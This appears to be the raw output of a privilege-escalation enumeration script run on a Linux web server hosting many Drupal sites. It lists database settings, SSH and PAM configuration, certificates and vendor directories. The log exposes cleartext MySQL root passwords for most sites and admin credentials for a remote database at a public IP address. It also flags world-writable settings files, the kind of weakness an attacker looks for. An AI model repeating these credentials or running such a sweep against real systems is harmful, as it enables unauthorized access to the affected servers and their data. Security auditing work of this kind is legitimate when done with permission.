 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbpo_bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33342 Feb 21  2023 /srv/web/ldb/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'ldb-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33342 Feb 21  2023 /srv/web/ldb9-5-0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'ldb-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 root root 33343 Mar  2  2023 /srv/web/lee/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lee_bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 root root 33341 Feb 21  2023 /srv/web/lee26-2-23/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lee_bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 root root 33343 Mar  2  2023 /srv/web/lee9-4-8/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lee_bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 root root 33343 Mar  2  2023 /srv/web/lee9-5-0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lee_bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxrwxrwx 1 www-data www-data 33344 Feb 13  2023 /srv/web/leve-9-4-8/ldb-9-4-8/leve/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'leve-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxrwxrwx 1 www-data www-data 33343 Feb 13  2023 /srv/web/leve-9-4-8/ldb-9-4-8/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'ldb-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r--r--r-- 1 www-data www-data 33466 Feb 15 03:58 /srv/web/leve-drup/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * 'prefix' setting. If a prefix is specified, the table name will be prepended
 * alphanumeric and underscore. If no prefix is desired, do not set the 'prefix'
 *   'prefix' => 'main_',
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'admin',
  'username' => 'admin',
  'password' => 'dcfvgb2020/',
  'prefix' => '',
  'host' => '193.194.89.11',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33344 Mar  1  2023 /srv/web/leve/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'leve-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33342 Feb 20  2023 /srv/web/leve9-4-8/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'leve-bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33344 Feb 28  2023 /srv/web/leve9-5-0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'leve-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 root root 33343 Feb 26  2023 /srv/web/lobem/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lobem_bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxrwxrwx 1 www-data www-data 33344 Feb 13  2023 /srv/web/lrza-9-4-8/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lrza-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33343 Feb 26  2023 /srv/web/lrza/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lrza-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33343 Feb 19  2023 /srv/web/lrza9-4-10/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lrza-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33343 Feb 26  2023 /srv/web/lrza9-5-0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lrza-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Sep 17  2021 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)





-rw-r--r-- 1 root root 603 Jan  3  2023 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 175 Jan  3  2023 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 95 Jan  3  2023 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 567 Jan  3  2023 /etc/ssh/ssh_host_rsa_key.pub

PermitRootLogin no
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/CFCA_EV_ROOT.pem
/etc/ssl/certs/COMODO_Certification_Authority.pem
/etc/ssl/certs/COMODO_ECC_Certification_Authority.pem
22630PSTORAGE_CERTSBIN

══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem	sftp	/usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Oct  8 06:38 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar 13  2021 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open




╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 May  2  2023 /usr/share/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 3 root root 4096 May 11  2022 /etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/vendor/paragonie/sodium_compat/.github
drwxr-xr-x 3 root root 4096 Aug 20  2022 /home/daoud/drupal-10.0.0/vendor/composer/installers/.github
drwxr-xr-x 3 root root 4096 Jul 20  2021 /home/daoud/drupal-10.0.0/vendor/pear/archive_tar/.github
drwxr-xr-x 3 root root 4096 Sep 28  2022 /home/daoud/drupal-10.0.0/vendor/twig/twig/.github
drwxr-xr-x 3 root root 4096 Aug 20  2022 /home/daoud/drupal-10.0.2/vendor/composer/installers/.github
drwxr-xr-x 3 root root 4096 Jul 20  2021 /home/daoud/drupal-10.0.2/vendor/pear/archive_tar/.github
drwxr-xr-x 3 root root 4096 Sep 13  2021 /home/daoud/drupal-9.4.10/vendor/composer/installers/.github
drwxr-xr-x 3 root root 4096 May 31  2022 /home/daoud/drupal-9.4.10/vendor/doctrine/reflection/.github
drwxr-xr-x 3 root root 4096 Jun 20  2022 /home/daoud/drupal-9.4.10/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 root root 4096 Jul 20  2021 /home/daoud/drupal-9.4.10/vendor/pear/archive_tar/.github
drwxr-xr-x 3 root root 4096 Dec 27  2022 /home/daoud/drupal-9.4.10/vendor/twig/twig/.github
drwxr-xr-x 3 root root 4096 Sep 13  2021 /home/daoud/drupal-9.5.0/vendor/composer/installers/.github
drwxr-xr-x 3 root root 4096 May 31  2022 /home/daoud/drupal-9.5.0/vendor/doctrine/reflection/.github
drwxr-xr-x 3 root root 4096 Jun 20  2022 /home/daoud/drupal-9.5.0/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 root root 4096 Jul 20  2021 /home/daoud/drupal-9.5.0/vendor/pear/archive_tar/.github
drwxr-xr-x 3 root root 4096 Sep 28  2022 /home/daoud/drupal-9.5.0/vendor/twig/twig/.github
drwxr-xr-x 3 root root 4096 Sep 13  2021 /home/daoud/drupal-9.5.2/vendor/composer/installers/.github
drwxr-xr-x 3 root root 4096 May 31  2022 /home/daoud/drupal-9.5.2/vendor/doctrine/reflection/.github
drwxr-xr-x 3 root root 4096 Jun 20  2022 /home/daoud/drupal-9.5.2/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 root root 4096 Jul 20  2021 /home/daoud/drupal-9.5.2/vendor/pear/archive_tar/.github
drwxr-xr-x 3 root root 4096 Dec 27  2022 /home/daoud/drupal-9.5.2/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbcm/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbcm/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbcm/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbcm/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbcm/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbpo/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbpo/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbpo/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbpo/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lbpo/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/ldb/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/ldb/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/ldb/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/ldb/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/ldb/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lee/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lee/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lee/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lee/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lee/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/leve/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/leve/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/leve/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/leve/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/leve/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lobem/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lobem/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lobem/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lobem/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lobem/vendor/twig/twig/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lrza/vendor/composer/installers/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lrza/vendor/doctrine/reflection/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lrza/vendor/guzzlehttp/psr7/.github
